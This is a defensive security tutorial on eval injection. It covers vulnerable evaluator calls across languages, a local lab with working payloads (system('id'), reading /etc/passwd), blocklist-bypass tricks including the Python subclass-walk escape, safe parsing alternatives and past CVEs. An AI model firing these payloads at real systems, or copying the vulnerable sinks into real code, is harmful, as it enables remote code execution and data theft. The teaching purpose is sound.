eval() is the dumbest version of remote code execution and it still ships in production code in 2026. The sink is one function call. The exploit is one request. The fix is not subtle. Yet every year I find at least one calculator endpoint, formula field, or "dynamic config" feature that hands a POST body straight to the language's own evaluator, then acts surprised when somebody sends system("id") instead of 2 + 2.
This is the variant deep dive under the remote code execution practitioner guide, sibling to OS command injection, argument injection, and server-side template injection. All four share the same underlying mistake (data reaches code), but eval is the one where the developer skipped the shell, the binary, and the template engine, and fed user input directly into the language runtime itself.
TL;DR
eval injection happens when an application passes user-controlled input to its language's runtime evaluator: PHP eval, Python eval/exec, JavaScript eval and the Function constructor, Ruby eval/instance_eval/class_eval, Perl eval EXPR, shell eval $cmd. The textbook sink is eval($_POST['expr']) and the textbook exploit replaces an arithmetic string with system("id"). The pattern shows up in calculator endpoints, formula fields, plugin loaders, and "dynamic config" features where the developer needed a tiny expression language and reached for the host runtime instead of writing a parser. Blocklist sanitisation (strip system, strip exec) loses every time because the host language has too many indirect call paths. The structural fix is to never invoke the runtime evaluator on untrusted input: use a real expression parser (simpleeval in Python, expr-eval in Node, a math grammar in PHP), use ast.literal_eval for literal-only data, or expose an allowlist of named operations and parse user input as a structured command.
The textbook sink
Every language has it. The shape is identical across PHP, Python, JavaScript, Ruby, Perl, and shell. The application reads a string from the request, hands it to the runtime evaluator, and the evaluator parses it as code in the host language. Nothing in between.
The canonical PHP version, lifted from the rce-basic lab's /calc.php:
$expr = $_POST['expr'];
echo eval("return $expr;");
The intended use is expr=2+2, returning 4. The exploit is expr=system("id"), returning the output of id. There is no escape hatch, there is no nuance, there is no "but only if". Any PHP expression the attacker writes runs as the web user.
The same anti-pattern in every language I see regularly:
# Python
result = eval(request.form['expr']) # arbitrary expression
exec(request.form['code']) # arbitrary statements
// JavaScript
const result = eval(req.body.expr); // classic
const fn = new Function('return ' + req.body.expr); // Function constructor
setTimeout(req.body.expr, 0); // string form of setTimeout
setInterval(req.body.expr, 1000); // same family
# Ruby
result = eval(params[:expr])
obj.instance_eval(params[:expr])
SomeClass.class_eval(params[:expr])
# Perl
my $result = eval $expr; # string form, NOT the eval { BLOCK } form
# Shell
eval "$user_supplied_command"
The shell one is especially fun because eval in a shell script is double-parsed: the shell expands variables and substitutions once when constructing the argument, then eval re-runs the resulting string through the parser. Any unescaped metacharacter in the user value gets a second chance to be interpreted as syntax.
JavaScript has the most footguns. eval itself is the obvious one. The Function constructor is eval with a slightly different scope chain (it creates a new function with the global scope as its outer scope, rather than executing in the local scope), and people reach for it thinking it is safer. It is not. setTimeout and setInterval accept either a function or a string; the string form is eval in disguise. vm.runInNewContext and vm.runInThisContext in Node are the explicit-evaluator forms. Every one runs arbitrary code if the input is untrusted.
Why developers keep reaching for eval
eval is not a stupid function. It exists because there are real cases where a program needs to run code it did not have at compile time. The mistake is the leap from "I need to evaluate an expression" to "the host language's evaluator is the right tool". Four realistic shapes I see in code review:
1. Scientific calculators and formula fields
A user wants to type 2 + 2 * sin(theta) into a form field and see a number. The developer thinks "the input is just math, what could possibly go wrong" and reaches for eval. The exploit is the difference between "math expression" and "arbitrary expression that happens to start with arithmetic". The runtime evaluator does not distinguish; it parses whatever you give it. Spreadsheet-like UIs are the same shape one layer up: formula columns wired to the host language because that is the path of least resistance.
2. Dynamic config and tiny DSLs
A config file lets non-developers customise behaviour with a little expression language. Rules engines for fraud, routing rules, alerting thresholds, feature flag predicates ("show this feature if user.tier == 'pro' and user.region in ['us', 'eu']"). The developer needs an expression evaluator, looks at how much work writing a parser is, and reaches for eval instead. The config file is "trusted" in some abstract sense, until the day it becomes editable through an admin UI, or a lower-privilege role gets write access to the config table, or it ends up loaded over HTTP from a CDN with a broken cache.
3. Plugin and extension loaders
A plugin system that loads third-party code at runtime and evals it because the developer wanted "hot reload". The plugins are "trusted" because they are written by the team, until they are written by partners, until they are user-uploaded. The eval call does not know anything about trust; it runs whatever bytes it receives.
4. Quick-and-dirty scriptable webhooks
"Customers can define their own webhook handlers and we will run them when events fire." The developer reaches for vm.runInNewContext or PHP eval or Python exec, isolates "just enough", and ships. The sandbox is the third layer behind "do not do this" and "if you do it, isolate the worker", and every sandbox built on the host runtime has had bypasses.
The common thread: the developer wanted a constrained expression language and reached for the unconstrained one because the constrained one is more work to build. The lesson is that the extra work is the actual feature, not the overhead.
Walking the lab
The rce-basic lab in the techearl-labs repo ships the laziest possible eval sink at /calc.php. Boot it:
docker compose up rce-basic
It listens on http://localhost:8085. The endpoint is documented as a "calculator" that evaluates arithmetic. The code behind it is the block shown earlier. The exploits:
POST /calc.php
Content-Type: application/x-www-form-urlencoded
expr=2+2
Response: 4. The intended path.
POST /calc.php
Content-Type: application/x-www-form-urlencoded
expr=system("id")
Response: uid=33(www-data) gid=33(www-data) groups=33(www-data). The unintended path, through system() reaching /bin/sh. Note that this is eval reaching system reaching the shell, three layers, all because the first one accepted a PHP expression.
POST /calc.php
Content-Type: application/x-www-form-urlencoded
expr=phpinfo()
Response: the full phpinfo() dump. Post-exploitation reconnaissance for free: PHP version, loaded modules, environment variables, file system paths, configured disable_functions, open_basedir, the lot. This is the recon equivalent of id on a Unix box; once you have eval, phpinfo() tells you the shape of the runtime you are sitting in.
Other useful payloads against the same endpoint:
expr=file_get_contents("/etc/passwd")
expr=`id`
expr=eval(base64_decode("c3lzdGVtKCJpZCIpOw=="))
The backtick one is interesting because PHP's backtick operator is equivalent to shell_exec, so the chain is request -> eval -> backtick -> shell. The base64 one decodes to system("id"); and wraps it in a second eval, because base64_decode on its own only returns the string. It starts to hint at why blocklist sanitisation is doomed (the next section).
The "I'll sanitise eval input" anti-pattern
Once a developer realises eval(user_input) is a problem, the next instinct is to filter the input. Strip system. Strip exec. Maybe a blocklist of "dangerous keywords". This loses every time, and it loses for a structural reason: the host language has too many indirect call paths.
A short tour of PHP bypasses against a hypothetical filter that strips the literal strings system, exec, passthru, and shell_exec:
// Dynamic function name from string concatenation
('sy'.'stem')('id');
// Variable function via $_GET to chain another input
$f = $_GET['f']; $f('id'); // request also supplies f=system
// base64-decoded function name, then call it
$f = base64_decode('c3lzdGVt'); $f('id');
// call_user_func with a string
call_user_func('sys'.'tem', 'id');
// hex-encoded function name (escape sequences in a double-quoted string)
$f = "\x73\x79\x73\x74\x65\x6d"; $f('id');
// reflection
(new ReflectionFunction('sys'.'tem'))->invoke('id');
// include a remote file containing the sink (when allow_url_include is on)
include('data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOw==');
Every one of these reaches system without the literal string system appearing in the input. PHP has at least a dozen ways to invoke a function by a runtime-computed name. A blocklist that tries to catch them all ends up bigger than the language spec and still loses to the next encoding trick.
Python has the same family of indirections:
# __import__ reaches os without the keyword 'os' or 'subprocess' appearing
__import__('os').system('id')
# Even better, walk the object graph from any literal
().__class__.__base__.__subclasses__() # find Popen via class hierarchy
# getattr with a computed name
getattr(__builtins__, 'ev' + 'al')('__import__("os").system("id")')
# compile + exec
exec(compile('__import__("os").system("id")', '<x>', 'exec'))
The Python class-hierarchy walk (().__class__.__base__.__subclasses__()) is the canonical sandbox escape: starting from any literal, you can reach every class loaded into the interpreter, including subprocess.Popen, and then call it. This is exactly the technique that makes Jinja2 SSTI work. JavaScript is worse: it has both eval-style indirection (this['ev'+'al']('...')) and prototype-chain access ((function(){}).constructor('return process')() reaches the global process object even without eval in the input).
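Returning to the Python class-hierarchy walk: the sketch below illustrates why emptying the builtins is not a sandbox. It assumes a hypothetical "restricted" evaluator that passes an empty __builtins__ mapping to eval; the variable names are illustrative, and subprocess is imported only so that Popen is loaded into the interpreter. The walk is inspected, never called.

```python
import subprocess  # imported only so Popen is loaded into the interpreter

# A common "sandbox" attempt: evaluate with every builtin name removed.
restricted_globals = {"__builtins__": {}}

# The payload needs no names at all. Attribute access on a tuple literal
# walks up to `object`, and object.__subclasses__() lists the loaded classes
# that derive directly from it.
classes = eval("().__class__.__base__.__subclasses__()", restricted_globals)

# Collect the class names that became reachable from the literal.
reachable = {cls.__name__ for cls in classes}
print("Popen" in reachable)
```

Removing names from the evaluation scope does not remove objects from the interpreter, which is why the restriction has to happen at the grammar level rather than the namespace level.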
The structural point is the same in every language: the runtime evaluator parses the host language, and the host language has many ways to spell any given operation. A blocklist sees the literal bytes; the parser sees the operation regardless of how it was spelled. Blocklists lose because they are fighting at the wrong abstraction layer.
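A minimal sketch of that mismatch, assuming a hypothetical substring blocklist (the BLOCKLIST contents and the passes_blocklist helper are invented for illustration). The payload is only resolved to a function object, never called, so nothing is executed on the host.

```python
import os

# Hypothetical filter: reject input containing any "dangerous" keyword.
BLOCKLIST = ("system", "exec", "popen", "subprocess")

def passes_blocklist(expr: str) -> bool:
    """Return True when none of the blocked substrings appear in expr."""
    return not any(word in expr for word in BLOCKLIST)

# The direct spelling is caught by the filter.
direct = '__import__("os").system'

# The same operation, spelled with a runtime-computed attribute name.
indirect = 'getattr(__import__("os"), "sys" + "tem")'

# Resolve (do not call) the expression that slipped through the filter.
resolved = eval(indirect, {}) if passes_blocklist(indirect) else None

print(passes_blocklist(direct), passes_blocklist(indirect), resolved is os.system)
```

The filter and the parser disagree about what the input means: the filter compares bytes, the parser resolves names at run time.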
The structural alternatives
The fix is to not invoke the host runtime evaluator on untrusted input at all. The right tool depends on what you actually needed.
Use a real expression parser with a defined grammar
If you needed an arithmetic expression evaluator (the calculator case), use a library that parses input against a constrained grammar and rejects anything outside it. The grammar defines what is allowed; the parser refuses everything else.
# Python: simpleeval is a constrained eval with a defined grammar
import math
from simpleeval import simple_eval
result = simple_eval("2 + 2 * sin(theta)", names={"theta": 0.5},
                     functions={"sin": math.sin})
// Node: expr-eval is a small math expression library
const { Parser } = require('expr-eval');
const expr = Parser.parse('2 + 2 * sin(theta)');
const result = expr.evaluate({ theta: 0.5 });
// PHP: a math parser library, not eval. Various options on Packagist.
$parser = new \MathParser\StdMathParser();
$ast = $parser->parse('2 + 2 * sin(theta)');
$result = $ast->accept(new Evaluator(['theta' => 0.5]));
These libraries parse the input as data, validate it against a grammar, and refuse anything that does not match. system("id") is not in the grammar, so it does not parse, so it never runs. The difference from eval is structural: the unsafe version says "yes" to any host-language expression; the safe version says "yes" only to expressions that match a defined shape.
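To make "says yes only to a defined shape" concrete, here is a hand-rolled sketch that uses only the Python standard library. It is not how any of the libraries above are implemented; the evaluate and _walk names and the three tables are assumptions made for illustration. It borrows Python's parser to build a syntax tree, then refuses every node type that is not explicitly allowed.

```python
import ast
import math
import operator

# Everything the "grammar" permits lives in these three tables (illustrative).
BINARY_OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
              ast.Mult: operator.mul, ast.Div: operator.truediv}
UNARY_OPS = {ast.UAdd: operator.pos, ast.USub: operator.neg}
FUNCTIONS = {"sin": math.sin, "cos": math.cos, "sqrt": math.sqrt}

def evaluate(expression, names=None):
    """Evaluate an arithmetic expression; raise ValueError on anything else."""
    tree = ast.parse(expression, mode="eval")  # parse only, nothing runs here
    return _walk(tree.body, names or {})

def _walk(node, names):
    # Numeric literals only (bool and str constants are rejected).
    if isinstance(node, ast.Constant) and type(node.value) in (int, float):
        return node.value
    # Variables must come from the caller-supplied mapping.
    if isinstance(node, ast.Name) and node.id in names:
        return names[node.id]
    if isinstance(node, ast.BinOp) and type(node.op) in BINARY_OPS:
        return BINARY_OPS[type(node.op)](_walk(node.left, names),
                                         _walk(node.right, names))
    if isinstance(node, ast.UnaryOp) and type(node.op) in UNARY_OPS:
        return UNARY_OPS[type(node.op)](_walk(node.operand, names))
    # Calls are allowed only to bare names found in the FUNCTIONS table.
    if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
            and node.func.id in FUNCTIONS and not node.keywords):
        return FUNCTIONS[node.func.id](*[_walk(arg, names) for arg in node.args])
    # Fail closed: attribute access, subscripts, lambdas, unknown calls, ...
    raise ValueError(f"disallowed syntax: {type(node).__name__}")

print(evaluate("2 + 2 * sin(theta)", {"theta": 0.5}))
```

Exponentiation is left out of the operator table on purpose, since an unbounded power is a cheap way to exhaust CPU and memory; a production version would also want a cap on input length and nesting depth.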
Use AST-walking for literal types
If you only needed to deserialise a Python-syntax literal (dict, list, tuple, number, string, bool, None), Python's standard library has the exact tool:
import ast
data = ast.literal_eval(request.form['data'])
ast.literal_eval parses the input as a Python expression, walks the resulting AST, and only evaluates nodes that represent literal values. Any function call, attribute access, or arithmetic operation raises ValueError. It is the right tool when you want to read structured data without going through JSON.
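A short sketch of that behaviour, using a hypothetical parse_literal wrapper (the name and the error-normalising choice are assumptions, not part of the standard library) so that callers only have to handle one exception type.

```python
import ast

def parse_literal(text: str):
    """Return the literal value in text, or raise ValueError for anything else."""
    try:
        return ast.literal_eval(text)
    except SyntaxError as exc:
        # Malformed input surfaces as SyntaxError; normalise it for callers.
        raise ValueError("not a Python literal") from exc

# A literal-only payload is accepted and returned as plain data.
print(parse_literal("{'tier': 'pro', 'regions': ['us', 'eu']}"))

# A call expression is rejected before anything runs.
try:
    parse_literal("__import__('os').system('id')")
except ValueError as exc:
    print("rejected:", exc)
```

The Python documentation notes that very large or deeply nested input can still exhaust memory or the recursion limit, so capping the input size before parsing is a sensible companion to this.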
Node has nothing exactly equivalent because JavaScript literals overlap with JSON; for most cases JSON.parse is the answer. When you need more (e.g. literal undefined or comments), there are small libraries (json5, acorn with a literal-only walker) that parse the input as an AST and refuse non-literal nodes.
Expose an allowlist of named operations
If you needed a plugin or rules system, do not let the user write code at all. Expose a small set of named operations, and parse the user input as a structured command that references those names. The user supplies the data (which operation, what arguments); the application supplies the code (the implementation of each operation).
{
"rule": "and",
"args": [
{ "rule": "eq", "args": ["user.tier", "pro"] },
{ "rule": "in", "args": ["user.region", ["us", "eu"]] }
]
}
The application's rule evaluator walks the tree, looks up and/eq/in in a fixed table of allowed operations, and applies them. Anything not in the table fails closed. The user controls the shape of the rule; the application controls every operation that can run.
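The rule evaluator described above can be sketched roughly as follows. This is an assumption-laden illustration rather than a reference implementation: the function names, the OPERATIONS table, and the convention that the first argument of eq and in is a dotted path into a context dictionary are all invented here.

```python
import json

def lookup(context, path):
    """Resolve a dotted path such as 'user.tier' by dictionary keys only."""
    value = context
    for key in path.split("."):
        value = value[key]  # plain dict indexing, never getattr
    return value

def _op_and(args, context):
    return all(evaluate_rule(child, context) for child in args)

def _op_eq(args, context):
    field, expected = args
    return lookup(context, field) == expected

def _op_in(args, context):
    field, allowed = args
    return lookup(context, field) in allowed

# The fixed table: the only code a rule can ever reach.
OPERATIONS = {"and": _op_and, "eq": _op_eq, "in": _op_in}

def evaluate_rule(node, context):
    """Walk the rule tree; any name outside OPERATIONS fails closed."""
    name = node.get("rule") if isinstance(node, dict) else None
    if not isinstance(name, str) or name not in OPERATIONS:
        raise ValueError(f"rule not allowed: {name!r}")
    return OPERATIONS[name](node.get("args", []), context)

rule = json.loads("""
{"rule": "and", "args": [
  {"rule": "eq", "args": ["user.tier", "pro"]},
  {"rule": "in", "args": ["user.region", ["us", "eu"]]}
]}
""")
print(evaluate_rule(rule, {"user": {"tier": "pro", "region": "us"}}))
```

Adding a new capability means adding one entry to the table, which keeps the attack surface reviewable in a single place.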
For more sophisticated needs, expression languages like CEL (cel-go, Google's Common Expression Language) are specifically designed for this: a constrained grammar with no side effects, intended to be evaluated against untrusted input.
Genuinely sandboxed runtimes
If after all of the above you still need to run arbitrary code from users (and this is rarer than developers think), the sandbox needs to be a real one: a separate process with no file system access, no network, no access to the host runtime, a hard time limit, a hard memory limit, and a syscall filter. vm.compileFunction in Node with parsingContext: vm.createContext({}) is a starting point, not an endpoint. The same applies to PHP Sandbox extensions and Ruby $SAFE levels (which Ruby itself deprecated and removed). Treat the sandbox as the third layer, not the primary defence.
Real-world incidents
A short tour of eval-shaped CVEs. As with the parent article, I would rather link to the NVD entries for version-specific detail than risk a stale number; the lessons are what I want to remember.
- Ruby on Rails YAML/eval, CVE-2013-0156 (January 2013). Rails before 3.2.11 / 3.1.10 / 3.0.19 / 2.3.15 parsed XML request bodies and converted YAML-typed elements via YAML.load. Ruby's YAML.load on Syck/Psych deserialises arbitrary objects, including types whose initialisers run code. An attacker could send an XML body containing a YAML payload that constructed an object whose instantiation triggered eval-equivalent code execution. Unauthenticated RCE on any Rails app accepting XML, which at the time was the default. The lesson is the deserialisation-to-eval pipeline: a parser that constructs language-native objects from attacker bytes is an eval sink wearing a costume.
- node-serialize eval-on-deserialise, CVE-2017-5941 (February 2017). The node-serialize npm package deserialised payloads of the form {"rce":"_$$ND_FUNC$$_function(){...}()"} by calling eval on the function body. Any application using it on untrusted input was an unauthenticated RCE. The pattern (deserialiser that calls eval) repeated in several other small packages.
- PHPUnit eval-stdin.php, CVE-2017-9841 (June 2017). PHPUnit before 4.8.28 and before 5.6.3 shipped Util/PHP/eval-stdin.php, a development helper that read the raw request body and passed it straight into eval(). The file was meant to live only inside the test harness, but Composer-installed projects routinely deployed vendor/ to production with the directory reachable from the web. Unauthenticated, single-request RCE against any Laravel / Symfony / Drupal / Magento site where vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php resolved on the public root. Still being mass-scanned years after disclosure; it is the realistic shape of how an eval sink ships to production: not in your code, but in a dev dependency you forgot to exclude from the deploy.
Across all three the pattern is the same: a developer needed dynamic behaviour and chose eval (or a deserialiser that reaches eval underneath) as the implementation. The CVEs differ in framework, language, and year; the underlying mistake does not.
Where to go next
This article is the deep dive on the direct-evaluator variant. The siblings and the wider map:
- Up to the remote code execution practitioner guide for the full RCE taxonomy.
- Across to OS command injection for the classic shell_exec sink and the argv-array fix.
- Across to argument injection for the variant that gets past escapeshellarg by abusing the called binary's own flag parser.
- Across to server-side template injection for the same data-becomes-code mistake one layer up in template engines.
- Back to the web application security vulnerabilities taxonomy for the hub.
The recurring lesson across the whole RCE family is the same one. Every place untrusted input crosses into something that parses bytes as code is a sink. For eval that something is the host language's own runtime, which is as bad as it gets: no intermediate layer to harden, no shell to swap out, no template engine to sandbox. The only reliable defence is to not let the crossing happen in the first place. Parse the input as data, against a grammar you defined. Reach for the runtime evaluator only when nothing else fits, and then assume the next CVE in the list above is the one you are about to ship.
Sources
Authoritative references this article was fact-checked against.
- OWASP, Code injection (owasp.org)
- CWE-95, Eval Injection (cwe.mitre.org)
- PHP, eval (php.net)





